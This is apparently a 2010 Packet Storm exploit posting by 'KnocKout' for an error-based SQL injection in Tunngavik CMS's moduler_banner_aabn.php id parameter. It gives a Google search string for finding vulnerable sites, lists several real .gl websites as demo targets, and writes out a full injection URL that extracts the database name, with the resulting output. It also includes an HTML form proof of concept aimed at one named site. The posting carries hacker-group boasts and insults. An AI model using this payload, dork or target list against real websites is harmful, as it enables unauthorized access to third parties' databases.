Tunngavik CMS SQL Injection

2010-12-19T00:00:00
ID PACKETSTORM:96808
Type packetstorm
Reporter KnocKout
Modified 2010-12-19T00:00:00

Description

                                        
                                            `=======================================================  
Tunngavik CMS <= Remote Based SQL Injection Exploit  
=======================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1  
3 3  
3 _ __ __ ________ __ __ 3  
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7  
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1  
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3  
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3  
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7  
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1  
3 >> Exploit database separated by exploit 3  
3 type (local, remote, DoS, etc.) 3  
7 7  
1 [+] Site : 1337db.com 1  
3 [+] Support e-mail : submit[at]1337db.com 3  
3 3  
7 ############################################ 7  
1 I'm KnocKout 1337 Member from 1337 DataBase 1  
3 ############################################ 3  
3 3   
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[~] HomePage : http://h4x0resec.blogspot.com  
[~] Reference : http://h4x0resec.blogspot.com  
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY  
##############################################################  
exploit(lamer)-DB.com FUCK n00b LAMERS.  
  
Kralýnýz gelsin. mua:) siksqlZkýrev..  
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Servia Kotisivut  
|~Price : N/A  
|~Version : N/A  
|~Software: http://www.tunngavik.gl/  
|~Vulnerability Style : based SQL INjection  
|~Vulnerability Dir : /program/  
|~sqL : MysqL based error  
|~Google Keyword : "Powered by Tunngavik CMS"  
|[~]Date : "19.12.2010"  
|[~]Tested on : (L):Vista (R):Microsoft-IIS/7.0 PHP/5.2.9-2 demos  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Demos:  
http://www.carllynge.gl  
http://www.nipilersornermikilinniarfik.gl  
http://www.kaf.gl/  
http://www.gif.gl  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Explotation| moduler_banner_aabn.php SQL Injection~~~~~~~~~~~}|  
  
http://$localhost/$path/program/moduler_banner_aabn.php?id=1 {Based SQL Injection}  
  
Ex; http://www.gif.gl/  
  
[~] SQL Injecting  
http://www.gif.gl/program/moduler_banner_aabn.php?id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1  
[~] MySQL Writes : Duplicate entry '~'gif'~1' for key 'group_key'  
[+] Database OK. : 'gif'  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
POC Exploit  
  
<html>  
<body>  
<form   
action="http://www.gif.gl/program/moduler_banner_aabn.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"   
method="POST">  
<input type="submit" name="kieli" value="Click and SQL Injection for click Enter">  
</form>  
</body>  
</html>  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
To your continue..  
  
=============================================================  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \   
| H \/ ^ /> <\ \_/ \ | \/\ ___/   
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/   
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/ Was here.  
================================================================  
`